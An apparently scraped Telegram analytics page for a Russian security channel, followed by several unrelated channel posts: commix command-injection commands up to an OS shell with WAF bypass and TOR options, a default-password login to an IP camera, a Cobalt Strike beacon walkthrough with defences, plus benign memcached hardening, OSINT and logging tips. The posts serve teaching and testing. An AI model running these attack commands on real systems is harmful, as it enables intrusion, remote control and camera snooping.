CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Mostrar más📈 Análisis del canal de Telegram CodeGuard: CyberSec Edition
El canal CodeGuard: CyberSec Edition es un actor destacado. Actualmente la comunidad reúne a 12 511 suscriptores, ocupando la posición 10 168 en la categoría Tecnologías y Aplicaciones y el puesto 52 930 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 12 511 suscriptores.
Según los últimos datos del 19 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 493, y en las últimas 24 horas de 23, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 11.98%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 6.31% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 495 visualizaciones. En el primer día suele acumular 787 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 3.
- Intereses temáticos: El contenido se centra en temas clave como codeguard, pysec, docker, grep, контейнер.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 20 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
Для успешного прохождения курса требуются общие знания в области веб-технологий: что из себя представляет язык гипертекстовой разметки, как реализуется клиент-серверное взаимодействие, что такое tcp/ip.👩💻 Проходим курс здесь 😈 CyberSec Edition | Чат
# 1. Базовый скан GET-параметра
commix -u "http://target.com/ping.php?ip=127.0.0.1" --batch
# 2. Проверка POST-запроса
commix -u "http://target.com/ping.php" --data="ip=127.0.0.1" --batch
# 3. Указываем конкретный параметр
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip
# 4. Выполнение команды
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-cmd="whoami"
# 5. Получаем pseudo-shell
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-shell
3️⃣ Выводы Commix в реале
[INFO] OS Command Injection vulnerability detected [INFO] Payload: ;id; [INFO] Current user: www-data [INFO] Operating system: Linux4️⃣ Продвинутые фишки
# Blind / Time-based injection
commix -u URL --technique=t --time-sec=5
# Обход WAF
commix -u URL --tamper=space2ifs,backticks
# User-Agent spoofing
commix -u URL --random-agent
# Прокси / TOR
commix -u URL --proxy=socks5://127.0.0.1:9050
🧠 Где тренироваться:
DVWA, bWAPP, Metasploitable2, Hack The Box (old-school boxes)
Полезно?
❤️ — Да
👍 — Нет
😈 CyberSec Edition | ЧатПолучил доступ к системам Пентагона и другим сетям Минобороны США, перехватывал трафик и данные, кейс считается первым публично признанным взломом Пентагона.2001–2002 — «безработный из Лондона» (дело Гари Маккиннона).
Несколько раз проникал в сети армии, флота, NASA и Минобороны, получал права администратора, удалял файлы и ставил удалённый доступ RemotelyAnywhere; пострадало около сотни военных и космических машин.2008 — заражённая флешка на базе США.
В ноутбук армии США на Ближнем Востоке вставили флешку с вредоносом, тот распространился по обычным и секретным сетям Пентагона — это назвали «крупнейшим взломом сети Пентагона» на тот момент и пересмотрели стратегию киберзащиты.2015 — компрометация почтовой системы военного командования.
Экс‑глава объединённого комитета начальников штабов США заявлял, что «российские хакеры» взломали электронную почту структур Пентагона в августе 2015 года.Параллельно — многолетние утечки и атаки на смежные системы.
Похищение данных о F‑35, кража 24 тыс. секретных файлов в 2011 году, взломы NASA, армейских и ведомственных сетей — всё это не всегда формально именуют «взломом Пентагона», но по факту бьют по инфраструктуре Минобороны США.«12 000+ взломов» — о чём на самом деле цифры К концу 2020 года Минобороны США зафиксировало более 12 тысяч найденных уязвимостей через платформы вроде HackerOne — это запуски контролируемых тестов и баг‑баунти, а не «успешные атаки врага». Участники находили баги во внешних системах, веб‑сервисах и инфраструктуре Пентагона, получая от 100 до 15 000 долларов за каждую критичную уязвимость, в отдельных конкурсах за считанные минуты успев обнаружить сотни проблем. То есть формально «взломы» там происходят десятки тысяч раз, но большая часть — легальные, согласованные проникновения ради укрепления защиты, а не шпионские операции. 😈 CodeGuard | Chat
▶️ Brute-force - перебор стандартных паролей (admin, 12345, пустой). ▶️ Поиск уязвимостей в веб-интерфейсе - старые версии ПО, injection-дыры. ▶️ Шпионские облачные сервисы - доступ к данным через 'левые' китайские платформы. ▶️ Ботнеты (вроде Mirai) - заражают устройства для DDoS-атак.Демонстрация (для исследования!):
# Пример запроса к уязвимой камере (изменённый)
curl -X POST "http://192.168.1.1/login.cgi" \
-d "username=admin&password=admin"
# Ответ: 'OK' и сессионная кука.
# Далее доступ к live-стриму: rtsp://admin:@192.168.1.1:554/stream1
Кто виноват?
- Производители, которые пашут на удешевление. - Пользователи, которые не меняют пароли. - Исходники прошивок, полные говна.Что делать?
▶️ Менять пароль по умолчанию. ▶️ Отключать UPnP и WPS. ▶️ Выпиливать камеру из публичного интернета (без проброса портов). ▶️ Ставить обновления, если они вообще есть.Shodan - поисковик дыр 😈 CodeGuard | Chat
🔵HTTP/HTTPS Beacon: Наиболее распространён. Имитирует легитимный веб-трафик, общается с сервером команды и управления (C2) через HTTP-запросы. 🔵DNS Beacon: Использует DNS-запросы для скрытого канала связи, часто обходит простые веб-фильтры. 🔵SMB Beacon: Коммуницирует через именованные каналы (named pipes), что полезно для внутреннего перемещения в доменной среде. Payload-ы: Эксплойты для доставки Beacon, такие как исполняемые файлы (exe), документы Office с макросами или скрипты PowerShell.Базовый сценарий: Развёртывание HTTPS Beacon Представьте, что вы специалист по безопасности (пентестер) и после фишинга получили доступ к рабочей станции в целевой сети. Теперь нужно установить стабильный канал управления. 1️⃣ Настройка Team Server (C2) Cobalt Strike разворачивается на сервере атакующего (Team Server), который принимает подключения от Beacon.
# Запуск Team Server (на сервере атакующего) ./teamserver [VPS_IP] [Shared_Password] [Profile_File]2️⃣ Создание Payload и запуск Beacon В клиенте Cobalt Strike создаётся вредоносный пакет (payload) для целевой системы.
# Генерация исполняемого файла (exe) с HTTPS Beacon Attacks → Packages → Windows Executable (S) Выбор Listener: HTTPS, указание домена C2 и порта.После доставки payload на цель (например, через фишинг) и его выполнения, на Team Server приходит "callback" от Beacon. 3️⃣ Взаимодействие и управление В клиенте появится новая сессия. Теперь можно выполнять команды, загружать модули, перемещаться по сети. Пример базовых команд в Beacon:
shell whoami # Выполнить системную команду upload /tmp/tool.exe # Загрузить файл на цель download secret.txt # Скачать файл с цели portscan 10.10.0.0/24 445 # Просканировать сеть на порт 445Результат (пример):
Beacon established to WORKSTATION-01\jdoe (High Integrity)Вывод: Beacon успешно внедрён в целевую систему под учётной записью пользователя с высоким уровнем привилегий. Это точка опоры для дальнейшей атаки. Как это работает изнутри:
🔵Malleable C2 Profile: Конфигурационный файл, который маскирует трафик Beacon под легитимные сервисы (например, под запросы к Google или Microsoft). 🔵Стадия (Staging): Малый начальный payload (stager) загружает основной payload (Beacon) в память, часто минуя диск. 🔵Сон (Sleep) и Jitter: Beacon не активен постоянно. Он "спит" заданные интервалы и добавляет случайную задержку (jitter), чтобы усложнить обнаружение.Защита: Как обнаружить и противостоять?
🔴Мониторинг сетевого трафика. Ищите аномальные DNS-запросы, регулярные HTTPS-соединения на нестандартные порты и несоответствие трафика заявленным User-Agent. 🔴Анализ процессов в памяти. Инструменты вроде EDR (Endpoint Detection and Response) могут обнаруживать инъекции кода и подозрительные действия PowerShell. 🔴Регулярное обучение пользователей для предотвращения успешных фишинговых атак - первоначального вектора доставки. 🔴Строгое сегментирование сети и применение принципа минимальных привилегий (Least Privilege) для ограничения перемещения атакующего.😈 CodeGuard | Chat
➡️ Блокировка внешнего доступа к порту кэша (11211) ➡️ Разрешение доступа только с localhost или определенных внутренних IP ➡️ Защита от случайного "открытия" сервиса в сеть ➡️ Простая и понятная конфигурация правил⚡️ Быстрая настройка связки: 1️⃣ Установка Memcached и ufw:
sudo apt update
sudo apt install memcached ufw
2️⃣ Базовая конфигурация Memcached (ограничение на localhost):
sudo nano /etc/memcached.conf
# Найти строку с `-l 127.0.0.1` и убедиться, что она раскомментирована
sudo systemctl restart memcached
3️⃣ Настройка ufw для полной блокировки внешнего доступа:
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw allow from 127.0.0.1 to any port 11211
sudo ufw enable
sudo ufw status verbose
💡 Для более сложных сценариев (например, доступ с другого сервиса в приватной подсети) можно настроить правило точнее, например:
sudo ufw allow from 192.168.1.0/24 to any port 11211
🚀 Официальный сайт Memcached
😈 CodeGuard | Chat1) Maltego — мощный инструмент для визуализации связей между людьми, доменами и организациями. 2) theHarvester — поиск e-mail, доменов и IP через публичные источники. 3) SpiderFoot — автоматический фреймворк OSINT для поиска по более чем 100 источникам. 4) Recon-ng — модульный инструмент для сбора информации через API-сервисы. 5) Shodan — "поисковик хакеров", индексирует IoT, камеры, серверы. 6) Censys — глобальный поиск по онлайн-устройствам и сертификатам SSL. 7) Amass — автоматический сбор поддоменов и сетевых связей. 8) FOCA — извлечение метаданных из документов и изображений. 9) ExifTool — анализ и извлечение метаданных из файлов и фото. 10) Creepy — геолокация пользователей по фото и соцсетям. 11) GHunt — исследование Google-аккаунтов по публичным данным. 12) Sherlock — поиск аккаунтов по имени пользователя на сотнях сайтов. 13) Holehe — проверка, на каких сервисах зареган email. 14) Social-Analyzer — анализ профилей человека по соцсетям и онлайн-сервисам. 15) Metagoofil — извлечение документов из домена и анализ их метаданных. 16) DNSDumpster — интерактивный поиск DNS-записей и поддоменов. 17) Wayback Machine — просмотр старых версий сайтов и утечек страниц. 18) WhoisXML API — WHOIS и IP-аналитика для доменов и инфраструктуры. 19) IntelX — поиск утечек, ключей API и паролей из открытых источников. 20) ReconDog — легкий и гибкий инструмент для первичного сбора данных.Этот OSINT-набор помогает работать "в белую": исследовать следы, находить инсайты и выстраивать аналитическую картину события. Будь орлом, поставь 👍 😈 CodeGuard | Chat
▶️ Формат JSON без аллокаций и отражений (reflection-free). ▶️ Поддержка уровней логирования (debug, info, warn, error, fatal, panic). ▶️ Встроенные timestamp’ы, stack trace и caller info. ▶️ Простая интеграция с context.Context для tracing’а. ▶️ Поддержка chainable API — декларативный стиль. ▶️ Совместимость с OpenTelemetry и структурными парсерами.⚡️ Быстрый старт с Zerolog: Установка:
go get github.com/rs/zerolog/log
Использование:
package main
import "github.com/rs/zerolog/log"
func main() {
log.Info().Str("service", "auth").Msg("Server started")
}
🟢Подходит для микросервисов, CLI и облачных приложений. 🟢Совместим с Docker, Kubernetes и Serverless инфраструктурой. 🟢Простое масштабирование логов через JSON pipeline.💻 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат
🔴делать скриншоты веб-страниц и веб-приложений; 🔴собирать метаданные: заголовки, коды ответов, технологии (через Wappalyzer); 🔴распознавать формы входа, чтобы быстро находить уязвимые точки; 🔴генерировать удобный HTML-отчет, где всё разложено по полочкам.📖 Как использовать EyeWitness?
🔵Устанавливаем (проще через клонирование репозитория GitHub). 🔵Подготавливаем файл со списком целей (IP или домены). 🔵Запускаем командой: ./EyeWitness -f targets.txt --web 🔵Ждем, пока инструмент обойдет все цели и сделает свою работу. 🔵Открываем красочный HTML-отчет и анализируем результаты.💡EyeWitness превращает скучный список адресов в наглядную карту целей. Больше не нужно открывать каждый сайт вручную - за вас это сделает автоматический сыщик. 😈 CyberSec Edition | Чат
"Есть два вида компаний: те, что были взломаны, и те, что пока еще не знают, что были взломаны. А когда они по итогу узнают об этом - если им посчастливится - начинается отчаянная паника, которая быстро доходит до уровня руководства компании."В этой книге в подробностях описывается подобный инцидент, расследование основанное на реальных событиях, начиная с первого сомнительного звонка, сделанного банком, атаки, до пика максимальной напряженности, вызванного предварительным криминалистическим анализом. 💠 Качай книгу → [Archive] 😈 CodeGuard | Chat
P.S. Пока ты читаешь — кто-то другой уже прокачивается.
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
